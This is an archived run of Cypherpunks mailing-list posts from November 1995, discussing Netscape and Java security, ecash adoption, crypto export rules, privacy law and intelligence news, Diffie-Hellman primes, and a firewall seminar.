On c2.org actually) and/or any advice you have http://www.digicash.nl/mt/ #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From perry at piermont.com Thu Nov 16 23:33:14 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 17 Nov 1995 15:33:14 +0800 Subject: Netscape rewards are an insult In-Reply-To: <30AAA306.64CF@netscape.com> Message-ID: <199511160333.WAA08987@jekyll.piermont.com> Jeff Weinstein writes: > All of these security measures are implemented by Netscape in the > current release. Specifically, Netscape Navigator 2.0beta2 > includes all the applet security precautions detailed in the recent > comp.lang.java posting. Netscape has been shipping the fixed > applet security model for over a month (since 2.0Beta1), and > Netscape and Sun continue to cooperate and work closely on applet > security issues. I've got to note just one thing -- every Netscape 2.0beta2 I've used has been so full of bugs, and so prone to problems, that I have my wonders about what the security code looks like. I know, Jeff, that it's all done by different groups -- but the Java stuff I've run in 2.0beta2 is so weirdly different than the supposedly compatible stuff I've run under HotJava -- especially when it comes to crashing (and it HAS crashed on me) that I have serious worries about the security of the thing. I'd say the quality looks very much like an alpha release, not "beta". I don't want to turn this to Javapunks so I won't say more on this topic any time soon -- it's already been beaten into the ground. Perry From rah at shipwright.com Fri Nov 17 00:03:02 1995 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 17 Nov 1995 16:03:02 +0800 Subject: e$: Financial Cryptography for Dogs, pt. 2. OpenDoc Kitchen, anyone? 
Message-ID: As a result of my temporary notoriety as OpenDoc Futurist(tm) ;-), I've heard about something called an OpenDoc Kitchen, which is a periodic hack fest put on by Apple for developers of OpenDoc parts where code is actually written. My understanding is that this will be held at Apple, in Cupertino, in early December. They are especially interested in anyone from Digicash who would like to make a digital cash OpenDoc component for Cyberdog, because I've been ranting to them about this picture in my head of someone dragging digital cash icons onto a register icon in a web browser to pay for a purchase. I expect that *any* digital cash part, even some kind of bashing of the current Mac ecash client into an OpenDoc part, would be cool by them as a first start. In addition, it seems to me that we may be close enough with MacPGP 3.0 to play with it at the component level, but maybe not... If you're interested, e-mail me, and I'll put you in touch with the right people. Now, the invitations have already been sent and RSVP'd on this, so we'd be coming in through the back door. Obviously, we're looking to put the best foot forward, as they are just about to the point of believing my mantra of "digital commerce *is* financial cryptography". I'm hoping to go, if there's something to do. I couldn't code my way out of a paper bag, but like the immortal Chauncey Gardener, "I like to watch." ;-). Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." 
--Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From jsw at netscape.com Fri Nov 17 01:17:12 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Fri, 17 Nov 1995 17:17:12 +0800 Subject: Netscape rewards are an insult In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com> Message-ID: <30AC4F87.7BDB@netscape.com> Matthew James Sheppard wrote: > I've got to note just one thing -- what about the Netscape LiveScript > language? is it opening up the same security can of worms as java? I > realise that it provides functionality specific to browsing only (no > network/files) but the potential for bugs when you add another > language must increase. One advantage that livescript has is that it was designed and implemented by one individual, removing communication problems as a possible source of holes. We are reviewing the set of reflected objects for possible security problems, and will be taking a conservative approach to what we include. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From don at cs.byu.edu Fri Nov 17 02:01:29 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Fri, 17 Nov 1995 18:01:29 +0800 Subject: Ecash account Message-ID: <199511170930.CAA00682@wero.byu.edu> So who here is going to use their ecash account to set up a money lau^H^H^Hexchange service? Ob Cyphernoise: Would Dr Fred, Alice, and any other names LD has set up for himself lately please keep the noise limited to email? Please? Ob Plonk: amen. So let it be written, so let it be plonked. Don From gimonca at mirage.skypoint.com Fri Nov 17 18:40:08 1995 From: gimonca at mirage.skypoint.com (Charles Gimon) Date: Fri, 17 Nov 95 18:40:08 PST Subject: No Privacy Right in Indonesia ? 
(fwd) Message-ID: I spent several minutes resisting a followup, but if people are going to discuss, I have to cave... Forwarded message: > > At 05:54 PM 11/17/95 -0500, "James M. Cobb" wrote: > > Activists in Indonesia who use the Internet say it is a powerful > > tool for distributing information in a society where self-censorship > > abounds, newspapers are tightly controlled, journalists > > are jailed and unlicensed magazines banned. > > The primary difference between Indonesian and Singaporean censorship > is that the Singaporeans are a lot more urbane about it, and generally > don't have crowds of protestors to shoot at. Reporting on the East Timor > activity is an especially good way to get kicked out of the country; > I know people it's happened to. Uncensorable communications can be > a substantial help, though rubber-hose cryptanalysis is still fairly > effective, and it's the type of place that would use it. > > A certain amount of US activism on the East Timor problems is Internet-based; > I don't know how connected it is to Indonesia or East Timor, which is > too underdeveloped to be very active on the net, and has the added problem > that activists are heavily watched. I'll try to keep this as short as possible... Almost anything on the Internet about East Timor is just crap. Get that out of the way first. I've put the entire Portugal domain in my kill file. It's like reading the lowest grade of anti-abortion rant from an AOLer. The issue under all the others is "what happens when Suharto dies". Lots of people, both in and out of power, are biding their time until Suharto leaves power. My hunch is that practically nobody in Indonesia has a PC at home like most US Internet users do. They're getting access through a company or university, or through a government office. A distributed network can resist censorship--but Indonesia isn't very distributed yet, and almost everyone is dependent on some sort of institutional access. 
Most people in Indonesia--including a lot of middle-class people--don't have a phone. You run down the street to a government Telkom office or a private Wartel office to make a phone call. Putting Web terminals in Wartels--now *that* would be a concept. If you dig into the UUCP maps for Java, you'll see a surprising number of sites listed in all sorts of little places. How many of those are up and operating, I have no idea. You are routinely warned that people at those sites are generally charged for receiving foreign e-mail, and that that can be expensive for them at current exchange rates. Private Internet providers (RadNet, IDOLA, IndoNet) have popped up only in the last year or so. I have links to some from my home page (http://www.skypoint.com/members/gimonca) As for the rubber hose...Indonesia is a fairly inscrutable country to try to figure out. They are quite capable of simply killing people if necessary; at other times, the wheels of justice turn agonizingly slow, and people are left free for the moment not knowing what might end up happening (a la Phil Zimmermann). My at-a-distance impression is that you see more of the Alabama-Sheriff's-Deputy kind of oppression than the Nazi-jackboot kind. Either way, it's millions of light years from the Libertarian Home World. Technology is a hot issue in Indonesia, partly because one of Suharto's favorite ministers, Mr. Habibie, is kind of a techno-nut, and has been pushing a variety of medium- and high-tech projects for Indonesia. Some people feel that he's being allowed to do whatever he wants, regardless as to whether his projects make any economic sense or not. After Suharto is gone, it will be interesting to see how high-tech stuff fares. In short, will Habibie end up giving it a bad name? Or will the technological middle class come to power and do it right the second time around? I'm going to stop rambling, and add something of more crypto-relevance. 
I've got an old article of mine about remailers in my web pages. (http://www.skypoint.com/members/gimonca/anonmail.html) I've talked it up in soc.culture.indonesia and soc.culture.malaysia. Later, sameer asked me to put a link to c2.org in there. Now, I'm getting a low but respectable number of hits on that page (30-40 per day)...so it's not out of the question that some of those Indonesian users might be finding their way to sameer's site for a badly-needed nym. From stewarts at ix.netcom.com Fri Nov 17 02:46:12 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 17 Nov 1995 18:46:12 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. Message-ID: <199511170734.XAA12528@ix3.ix.netcom.com> At 03:13 PM 11/16/95 -0600, Scott Brickner wrote: >The problem is that the non-encryption program must use the same >interface as the encryption program. Text compression is often cited .... >You'd need a program which not only *accepted* the additional parameter, >but also *needed* the second parameter. I confess I have some difficulty >thinking of one. If you support user-specified program/module interface which take arbitrary string-valued arguments (e.g. Unix-style stuff or objects), and you've got negotiation methods that can accept args, then you've got a very general system which they shouldn't be able to argue with - so the drop-in authors can hand the keys around as 0xHEX-strings rather than bignums without the program needing to know. Sorting and backup systems often want lots of options. If you decide for reliability reasons to insist on registered module names, to prevent problems like six different sorting modules with different argument orders, or backup modules with different ideas of "original" and "copy" (switching those two can be _Very_ annoying!), then there's even a mechanism which the crafty foreigner to distribute modules and documentation! 
>> An abstract set of open/modify/close >> routines (where open returned a pointer to opaque state, say a session >> key :) would be fine. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From sameer at c2.org Fri Nov 17 02:46:16 1995 From: sameer at c2.org (sameer) Date: Fri, 17 Nov 1995 18:46:16 +0800 Subject: COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH Message-ID: <199511170805.AAA10143@infinity.c2.org> For Immediate Release - November 17, 1995 Contact: Sameer Parekh sameer at c2.org 510-601-9777 COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH Community ConneXion today announced that it has become the first and only Internet Service Provider in the world to allow for payment using ecash, a digital cash system developed by DigiCash bv, of Amsterdam, Holland, released jointly with Mark Twain Bank, of St. Louis, Missouri. On October 23rd, DigiCash bv announced jointly with Mark Twain Bank that they would be issuing ecash denominated in real U.S. Dollars. In the past DigiCash had been running a trial "CyberBucks" payment system, which was not backed by any strong currency; it was a form of "Monopoly Money". The ecash system provides full payor anonymity. Consumers can use ecash tokens to pay for goods on the Internet, with full anonymity from the merchants. This lets consumers buy things without fear of merchants compiling and selling databases of their spending habits. It also allows for a convenient and safe mechanism for payment through the Internet. Sameer Parekh, President of Community ConneXion, said that ecash is a significant improvement over the payment systems widely in use on the net today. He described one example, "Currently people usually just send their credit card numbers over the net to the merchant if they want to buy something. 
This opens up the security risk of having the merchant's computers broken into; every consumer's full credit limits are then subject to attack. With ecash, only the limited sums that have been spent are at risk." Community ConneXion has begun accepting ecash as payment for its services, offering a five percent discount for customers who pay with ecash. "It simplifies our accounting and protects the privacy of our clients; it is to everyone's benefit to use ecash," said Parekh. "Ecash has greatly simplified account creation procedures for our anonymous accounts. In the past someone creating an anonymous account would need to wait until their payment arrived, and their check cleared, before the account could be created; now, the account is created automatically, immediately after the ecash payment is made over the world-wide-web." Community ConneXion is the leading provider of privacy on the Internet. They provide anonymous and pseudonymous internet access and web pages in addition to powerful web service, virtual hosts, and web design consultation. Information is available from their web pages at http://www.c2.org/. Information about the Mark Twain Bank ecash release is available from http://www.marktwain.com/ecash.html. DigiCash, CyberBucks, and ecash are trademarks of DigiCash bv. Mark Twain Bank is a trademark of Mark Twain Bancshares. Monopoly is a trademark of Parker Brothers, Division of Tonka Corporation. From jcobb at ahcbsd1.ovnet.com Fri Nov 17 02:46:51 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Fri, 17 Nov 1995 18:46:51 +0800 Subject: No Privacy Right in UK ? Message-ID: Cypherpunks assume privacy is a good thing and wish there were more of it. 
--Welcome to cypherpunks Friend, 11 16 95 The Electronic Telegraph runs a newsstory headed Doorstep polish researcher was whiplash injuries spy Here are excerpts from the newsstory: Miss [Natalie] Goldner had been hurt when a car in which she was a passenger was hit from behind in April 1988, and she was forced to leave her video library job. Shortly after the accident, she started a claim for compensation and future loss of earnings against the Royal Insurance Company. ...Margot Christie...was working for the Hampshire Detective Agency when she went to Miss Goldner's house in October 1991. Christie posed as a market researcher. It was only when a compensation claim reached court that Miss Goldner realised the "researcher" was a private detective hired to discover the extent of her injuries. In a report which was due to go before the court, Mrs Christie said she had asked Miss Goldner to test some polish and window cleaner. [Christie] returned 11 days later. "I asked the plaintiff if the polish had given a good shine and if she had rubbed hard. The plaintiff said 'Yes I did, it didn't smear at all'." Natalie lives with her mother. "I felt as though we had been burgled. I felt violated. We were so worried afterwards that we just didn't trust anyone who turned up at our door. "She asked lots of questions about who did the housework in our house. We were just chatting away and I had no idea she was there to spy on me." Natalie settled out of court. In September, she accepted a 20,000 [pound] settlement after one day of a planned four-day court hearing. She is to lodge a complaint with the Association of British Investigators.... Fortunately, the Daily Telegraph publicized the case. The newsstory points out: A spokesman for Liberty, the civil rights group, said: "There is no right to personal privacy in Britain and so it [invasion of privacy by deception] is not against the law." Cordially, Jim NOTE. 
The Electronic Telegraph can be accessed at http://www.telegraph.co.uk The online filename of the above newsstory is: nspys16.html From anonymous-remailer at shell.portal.com Fri Nov 17 19:01:53 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 17 Nov 95 19:01:53 PST Subject: CSE gets flak on TV Message-ID: <199511180300.TAA16642@jobe.shell.portal.com> Alice here (the real one) ... On Thu, 16 Nov 1995 anonymous-remailer at shell.portal.com wrote: > Hmm, actually the news tape is reading a little strange here in Canada. > Not AP, or REUTERS, but simply the Canadian Press newswire. [long exercise in character assassination deleted] I think that this "writer" who felt that it was desirable to attach MY name to this drivel deserves a good flogging. Clearly, someone is spending WAY too much time on //WIRES on the Dow Jones News Retrieval Service, or wherever else they get to Canadian Press news stories. The matter Mr. mystery-writer detailed is in fact a Canadian matter, a domestic affair, which has no concern to an international audience. Taking three successive news stories from three days ... (press stories, I've since pulled for my own reference) and pasting them together to indicate some type of Machiaevellian?? (sp) exercise is simply "not done." > And all these stories ... coincidentally ... broke back to back. > > It's almost as though the country is disinfecting itself, or has taken > one particularly powerful laxative. I don't see this at all. The CSE story has no connection to anything else which is occurring domestically nor internationally. No relationship whatsoever. > But the CSE story is really, really smelly. The worst of the whole lot. > > I think that there might be more to this than appears on the surface. > Maybe filling in some details might help our friends on this list. > > You listening, Perry??? 
I think Perry has far more interesting fish to fry, than to worry about domestic Canadian affairs, and what occurs within another sovereign's borders. Whether or not Canada has collected and analyzed communications traffic on the activities of foreign states, corporations, and people is simply a Canadian matter. It's OUR affair. > "And if, in fact, there has been illegal activity going on, we'll want to > deal with that in as public a way as possible," said Sheila Copps. > > The Mexican government has presented a diplomatic note to Canada > expressing "surprise and concern" over the report that it was spied on > during the North American free-trade talks. > > South Korea is looking into the matter as well. Airing dirty laundry like this serves no purpose, whatsoever. It's not productive and is not focused to any particular policy objective. And in any event, the Canadian Communications Security Establishment does serve up "sloppy seconds" (as some other poster named them) under intelligence sharing agreements with its counterparts in the United States, Britain, Australia, and New Zealand. In the same vein, it also is a recipient of same. These agreements and working relationships have historically benefitted all. > And I guess ... that's all of the news that I've got to this hour. Except > for one brief note, that Prime Minister Chretien tried to call the States, > but the Government shutdown meant that his call couldn't get through. > I think he tried to call NASA. Fella ... whoever you are ... please get your stories straight. The Prime Minister of Canada was trying to call NASA, not the NSA. There IS a significant difference between the two, as near anyone on this list can attest. The Prime Minister was attempting to contact Canadian astronaut Chris Hadfield, who is on the space shuttle Atlantis which is presently docked with the Russian space station Mir. He wasn't trying to call the NSA ... it was the NASA. 
In fact, the Prime Minister's comments from the Commonwealth meeting in New Zealand were most clear. "This is an organization that works within the law of Canada. They do not report to me on a daily basis and I cannot make any comments on if they are spying on anybody, I don't know. But they have a mandate to check a few things around the world." Please try reading the list for a bit, before posting and confusing people. > Speaking personally, I just think that something is a bit fishy. I mean > "Jane Shorten" is a nym if I ever heard one ... probably married to > "Dick Lengthen" or something. Your juvenile antics deserve no further comment. > I mean ... HELLO .... GiGGle TesT ... what on earth did she think the CSE > did?? Made snowmen and skated on the Rideau Canal?? I don't think that this is relevant. And btw, it's giggle test ... it's not "GiGGle TesT". I learned how to use a shift key long, long ago. You oughta try it some time. > The agency IS obligated to destroy information about Canadians it scoops > up in its electronic net. A rare exception might be a phone call > describing a terrorist plot, but that would truly be exceptional, I think. > > I mean its not like one big fishing expedition. The CSE does not target its own citizens and has agreements with other agencies that they will not either. If someone's communication is accidentally caught in the net, the CSE is obligated to destroy the information except in the rarest of circumstances. (i.e. foreign terrorists) > And that's the fleshed out version of the story. Your fleshed out story was very interesting ... especially the way you tied things together. Did they teach you to do that type of thing somewhere?? But it's not appropriate for this list. And this is a Canadian matter. > I'm just sorry that our Prime Minister is in such a bad position because > of the timing of this "Jane Shorten's" revelations. She also revealed > that Canada spied on Japan. > > To think ... 
> Canadian Prime Minister Chretien is a guest of the Japanese
> people today. Talk about some awkward moments. I mean, what on earth do
> you talk about??
>
> George Bush and Sushi??

Cute ... really. I'm certainly amused. As I'm certain were all the Americans on this International list. George Bush, simply had jet lag, when he threw up at Japan. What does he have to do with anything? Canada and Japan have a great deal to speak about. Canada might even be a good friend and help the US with the Okinawa problem. Who knows? We never know how these things play. I really don't think that Canada will be marginalized by this, and I certainly hope that neither will I. Your antics, notwithstanding, and your imagination of "tying things together" serves no purpose. The people on this list can filter fact from fiction.

> Alice de 'nonymous ...
>
> ...just another one of those...
> ...hunters...
>
> P.S. This post is in the public domain.
> C. S. U. M. O. C. L. U. N. E.

Like, I said ... very, very cute. There's only one problem, mr mystery-writer, I only have one or two interests on this list. And politics is not generally one of them. My interests are simply and in order of personal importance,

- removing known Security Holes in existing software or removing the software, (e.g. Netscape Navigator and Java), and
- finding some secure way to implement functional international commerce via the Internet. Probably, something ECU based.

Security and E-cash. Your attempt to create some type of political "brownie points" or desire to gain some attention or notoriety simply distracts me from addressing the real issues, and addressing my backed-up email. MALICE DE MONSTEROUS wasn't enough for you?? Please don't bother with any reply. None is expected.

Alice de 'nonymous ...

...just another one of those...
...hunters...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.
From wb8foz at nrk.com Fri Nov 17 05:04:51 1995
From: wb8foz at nrk.com (David Lesher)
Date: Fri, 17 Nov 1995 21:04:51 +0800
Subject: Electronic Records in NYS
Message-ID: <199511171239.HAA17717@nrk.com>

>From another list:

Forwarded message:
Date: Thu, 16 Nov 1995 09:52:50 -0500
Sender: Computer-assisted Reporting & Research
From: Ann Marie Przybyla
Subject: Electronic Records User Survey
X-To: CARR-L at ulkyvm.Louisville.edu
To: Multiple recipients of list CARR-L

This message is being posted to several lists; please excuse any duplication
****************************************************************

Colleagues:

The New York State Archives and Records Administration (SARA) has acquired four significant electronic data sets generated by New York State agencies, including the Department of Education and the Department of Correctional Services. To enhance access to the data sets, SARA is conducting a survey targeted at researchers who use machine-readable data and statistical analysis for their work. A high level of participation in this survey would be very helpful. If you would like to participate, please contact:

Ann Marie Przybyla
Electronic Records and Networking Services Unit
New York State Archives and Records Administration
aprzybyl at mail.nysed.gov

--
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

From habs at warwick.com Fri Nov 17 05:59:29 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Fri, 17 Nov 1995 21:59:29 +0800
Subject: Java & Netscape security (reply to misc.
postings)
In-Reply-To: <199511170439.UAA19926@netcom17.netcom.com>
Message-ID: <199511171345.IAA19681@cmyk.warwick.com>

>
> After reading http://java.sun.com/1.0alpha3/doc/security/security.html my
> (possibly faulty) understanding of Java security is that it will not allow
> an applet to speak to IP addresses other than the one it was loaded from.
> I have a question:

FYI. According to an interview I did with Sun. Inter applet communication, btw, can only occur between applets from the same IP address, same domain name and on the same page...

/hawk

From asb at nexor.co.uk Fri Nov 17 06:49:52 1995
From: asb at nexor.co.uk (Andy Brown)
Date: Fri, 17 Nov 1995 22:49:52 +0800
Subject: 4096 bit strong prime for Diffle-Hellman
In-Reply-To:
Message-ID:

On Tue, 14 Nov 1995, Eric Young wrote:

> Just for anyone interested, I 'found' a suspected 4096 strong prime (p and
> (p-1)/2 are prime) for use with Diffie-Hellman, generator of 2.

As a matter of interest, how long did it take you to generate this, and with what hardware? I left a 120Mhz Pentium searching for 15 hours overnight without any success (it managed to eliminate 10 candidate primes as not strong in that time).

Regards,

- Andy

-----------------------------------------------------------------------
Andrew Brown Internet Telephone +44 115 952 0585
PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88
All views expressed here are my own and not those of my employer

From jya at pipeline.com Fri Nov 17 07:53:13 1995
From: jya at pipeline.com (John Young)
Date: Fri, 17 Nov 1995 23:53:13 +0800
Subject: Cornell Cracks Down on Private E-MAIL...
Message-ID: <199511171522.KAA11733@pipe4.nyc.pipeline.com>

Responding to msg by pcw at access.digex.net (Peter Wayner) on Fri, 17 Nov 9:47 AM

----------

The New York Times, November 17, 1995, p. B8.
Penalties Decided in E-Mail at Cornell

Cornell University has reached agreement with four students on punishment for a widely distributed E-mail message they wrote listing "75 reasons why women should not have freedom of speech." The university rejected harsh penalties like suspension because the students did not engage in sexual harassment, university officials said yesterday.

The university had investigated complaints of sexual harassment and misuse of computer resources after the message made its way on the Internet last month, angering thousands of computer users who sent angry responses to the four students. The message included the lines, "If she can't speak, she can't cry rape" and, "Of course, if she can't speak, she can't say no."

The university said the students had agreed to attend a program dealing with date and acquaintance rape, and would perform 50 hours of community service.

-----

There was a somewhat longer NYT article a day or two ago; anybody want it, send your PIN_kie.

From smithmi at dev.prodigy.com Fri Nov 17 08:10:48 1995
From: smithmi at dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 00:10:48 +0800
Subject: COE Recommendation No. R (95) 13
Message-ID: <199511171546.KAA17869@tinman.dev.prodigy.com>

>>9. Subject to legal privileges or protection, most legal systems permit
>>investigating authorities to order persons to hand over objects under
>>their control that are required to serve as evidence. In a parallel
>>fashion, provisions should be made for the power to order persons to
>>submit any specified data under their control in a computer system in the
>>form required by the investigating authority.
>>________________________________________________________________________
>
>>Is this 'what we would want'? It clearly means that one can be ordered
>>to reveal the password to encrypted data and punished by law if one
>>refuses.
Forgive me if this point has already been raised, but couldn't an objection to such laws be based on the protection against self-incrimination?

Maybe this all depends on whether the legal context is a civil or a criminal proceeding. If I'm being sued and they ask me at a deposition whether I did such-and-such, I can't take the Fifth (or can I?). But if I'm accused of murder, the police can't make me tell them where I've buried the knife. However, if I have a wall safe and they get a warrant to search it, can I be jailed for contempt if I don't give them the combination?

This seems to be a case where existing legal paradigms ought to extend rather naturally. Whether the existing paradigms are any good or not is of course a separate question.

--Michael Smith
smithmi at dev.prodigy.com

From walrus at ans.net Fri Nov 17 08:45:25 1995
From: walrus at ans.net (michael shiplett)
Date: Sat, 18 Nov 1995 00:45:25 +0800
Subject: SA: Confidential Communication on the Internet
In-Reply-To:
Message-ID: <199511171627.LAA17236@fuseki.aa.ans.net>

"ao" == Aleph One writes:

ao> On the December issue of Scientific American there is an article
ao> by Thomas Beth, "Confidential Communication on the Internet".
ao> Lite on the technical side but good reading anyway.

This seemed to be a duplication of an X.509 certificate hierarchy: ``Hey, I don't know who you are but you have a seals which go back to a CA I trust.'' In this respect the information seemed unworthy of an article in SA. Perhaps I did not read the article closely enough?
michael

From Piete.Brooks at cl.cam.ac.uk Fri Nov 17 09:45:50 1995
From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks)
Date: Sat, 18 Nov 1995 01:45:50 +0800
Subject: Mbone seminar 21st Nov 16:15UTC: FIREWALLS AS A NETWORK SECURITY TOOL
Message-ID: <"swan.cl.cam.:178540:951117141816"@cl.cam.ac.uk>

Executive summary
=================

Any non UK site interested in seeing an MBone transmitted seminar on 21st November at 16:15 UTC entitled "FIREWALLS AS A NETWORK SECURITY TOOL" should contact me to get the IP address and TTL changed.

Plug, caveat, etc
=================

To enable "lone" security researchers (i.e. not enough people in the dept to have regular Security Seminars) in the UK to "keep in touch", we transmit our departmental Security Seminars on the MBone each week, with a low TTL and administratively scoped to the UK (so we don't have to worry about clashing with other events. The AC.UK MBone is fully pruning, and typically has spare bandwidth).

These are not big formal events, but typically have a dozen or two members of the department and other "locals" present. The termly program is available on the Web in http://www.cl.cam.ac.uk/Seminars under "Security seminars" [ That way you can see our more formal "Departmental Seminars" listing at the same time :-) ]

It's run as a "DIY" service (i.e. members of the group set things up) so things may go amiss. However, if they do (or there are time zone problems) it is fairly simple to retransmit later (during UK office'ish hours -- unless someone has some magic to start up vat and vic or nv without using X) from the tape we make ...

Full details
============

As Firewalls are of interest to both these lists (sorry for cross posting!) I thought I might take this opportunity to draw your attention to this particular seminar. See http://www.cl.cam.ac.uk:80/Seminars/mbone.html for the latest info (e.g.
slides will appear when I get them), but here is the announcement (roughly) as I received it:

*** *** *** *** ***

University of Cambridge Computer Laboratory
SECURITY SEMINAR SERIES

SPEAKER: Alec Muffett, Sun Microsystems
DATE: Tuesday 21st November at 4.15pm
PLACE: Room TP4, Computer Laboratory
TITLE: FIREWALLS AS A NETWORK SECURITY TOOL

The "Firewall" - taking the (quite broad) definition of a firewall's being any device designed (in some manner) to restrict "soft" access to a network - has migrated from being a tool of the paranoid systems administrator, into being a standard part of modern network infrastructures. This seminar will review why this situation has come about, what modern firewall architectures (both basic and advanced) look like, examine what they can/cannot accomplish, and will speculate upon the future potential of firewalls as access-security devices.

*** *** *** *** ***

As noted above, by default these are normally restricted to UK MBone sites, so let me know in advance (the M/C IP address changes !) if it is wanted further afield.

From tcmay at got.net Fri Nov 17 09:57:27 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 18 Nov 1995 01:57:27 +0800
Subject: Corrections about Bob Noyce and Intel
Message-ID:

At 4:55 PM 11/17/95, attila wrote:

> 2. most were pioneers: a specific example is Bob Norris who walked
> out of a Fairchild board meeting being rejected for his
> eighth try at replacing Germanium because the first seven had
> failed. A couple of VCs, among them Arthur Rock and Bob Perring
> said: "...we believe you, let's try silicon..." and we have Intel.

Bob Noyce was already making silicon devices at Fairchild. The "planar process" was developed by him in the late 50s. It is not the case that Fairchild was stuck making germanium, nor that Intel was the first to use silicon. I could go on about the actual history, but this is far from the themes of this list, and many books cover the history very well.
What Intel pioneered the development of was _silicon-gate MOS_, where the aluminum gates of traditional silicon devices is replaced with polysilicon gates. Intel did this by hiring the silicon-gate gurus from Fairchild (Vadasz, Grove, Faggin, etc.).

> But, who drives Intel today? --Grove, who is labelled as the
> founder. Grove made the _business_ -the brains have been
> forgotten. Norris was the darling of the VCs for a couple years
> until they figured he couldn't spot a _financial_ success.

Grove remains a technologist--I studied semiconductor physics from his wonderful 1967 book, "The Physics and Technology of Semiconductor Devices"--and the group that leads Intel is highly technical. Gordon Moore remains connected, materials scientist Craig Barrett (who hired me into Intel in '74, ironically) is next-in-line to be President, Gerry Parker is a top technologist, and so on.

As to Bob Noyce being the "darling of the VCs for a couple of years until they figured he couldn't spot a _financial_ success," I should just let that one pass. Noyce of course has been dead for several years. When he was alive, though, he "spotted" several financial successes.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From hallam at w3.org Fri Nov 17 10:23:12 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sat, 18 Nov 1995 02:23:12 +0800
Subject: COE Recommendation No.
R (95) 13
In-Reply-To: <199511171546.KAA17869@tinman.dev.prodigy.com>
Message-ID: <9511171800.AA07897@zorch.w3.org>

>Forgive me if this point has already been raised, but couldn't an
>objection to such laws be based on the protection against
>self-incrimination?

There is no such right in most (if not all) European countries. In France there is not even the presumption of innocence.

The British Conservatives have recently passed a criminal justice Bill which abolishes the right to silence and most other protections for the defendant. They are busy writing another.

That is not to say US politicians are any better. Congress is busily rolling back on all the protections they can. Got to fill those jails somehow you know.

Phill

From grdawe at toad.com Fri Nov 17 10:42:52 1995
From: grdawe at toad.com (grdawe at toad.com)
Date: Sat, 18 Nov 1995 02:42:52 +0800
Subject: nnets & crypto
Message-ID:

IMHO etc., *any* time there is an application involving pattern-matching and analysis of complex in->out relations/functions there is a possible application of NN's. That's not to say that a particular application would be a panacea, but designed properly I think an NN could be of value in differential crypto, discovering crypto-weak (i.e. strong) correlations between in->out, etc. My intuition says there is or can be value as a tool for the cryptanalyst. I would also not discount the use of NN's in ENcrypting, given the capability of NN's realizing (almost) any arbitrary, nonlinear function from in->out.

Caveat: practical considerations not accounted for in these opinions.

>Date: Fri, 10 Nov 1995 11:52:41 -0800
>From: Bill Stewart
>Subject: Re: coding and nnet's

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography, primarily because of the shape of the solution space.
>Neural nets work best for problems that have a continuity of
>solutions, some better than others. This allows a neural net to
>learn, proposing better and better solutions as it does.
>Breaking an
>algorithm provides for very little in the way of learning
>opportunities: You either recover the key or you don't. (At least
>this is true if the algorithm is any good.)

Has anyone tried using neural nets or similar techniques for searching for useful nonrandom properties of the round functions of block ciphers or hash functions? This might be useful in trying to prepare some new kind of attack, find a balanced binary function that is useful in using the generalization of linear cryptanalysis discussed by Harpes, Kramer, and Massey at Eurocrypt '95, find a better "difference" function for use in a differential attack, etc.

>Neural nets work well
>in structured environments when there is something to learn, but not
>in the high-entropy, seemingly random world of cryptography." And he
>doesn't give any references.

Merkle's paper on Khufu and Khafre addresses this idea, I think. Merkle comments that it's not going to be useful against a full cipher, but that it might be useful against (say) Khufu with one or two octets.

># Thanks; Bill
># Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
># Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

Note: Please respond via e-mail as well as or instead of posting, as I get CP-LITE instead of the whole list.

--John Kelsey, jmkelsey at delphi.com
PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

From dreschs at mpd.tandem.com Fri Nov 17 10:43:00 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Sat, 18 Nov 1995 02:43:00 +0800
Subject: COE Recommendation No.
R (95) 13
In-Reply-To: <199511171546.KAA17869@tinman.dev.prodigy.com>
Message-ID: <199511171810.MAA09890@galil.austnsc.tandem.com>

smithmi at dev.prodigy.com (Michael Smith) said:

>>> 9. Subject to legal privileges or protection, most legal systems
>>> permit investigating authorities to order persons to hand over
>>> objects under their control that are required to serve as
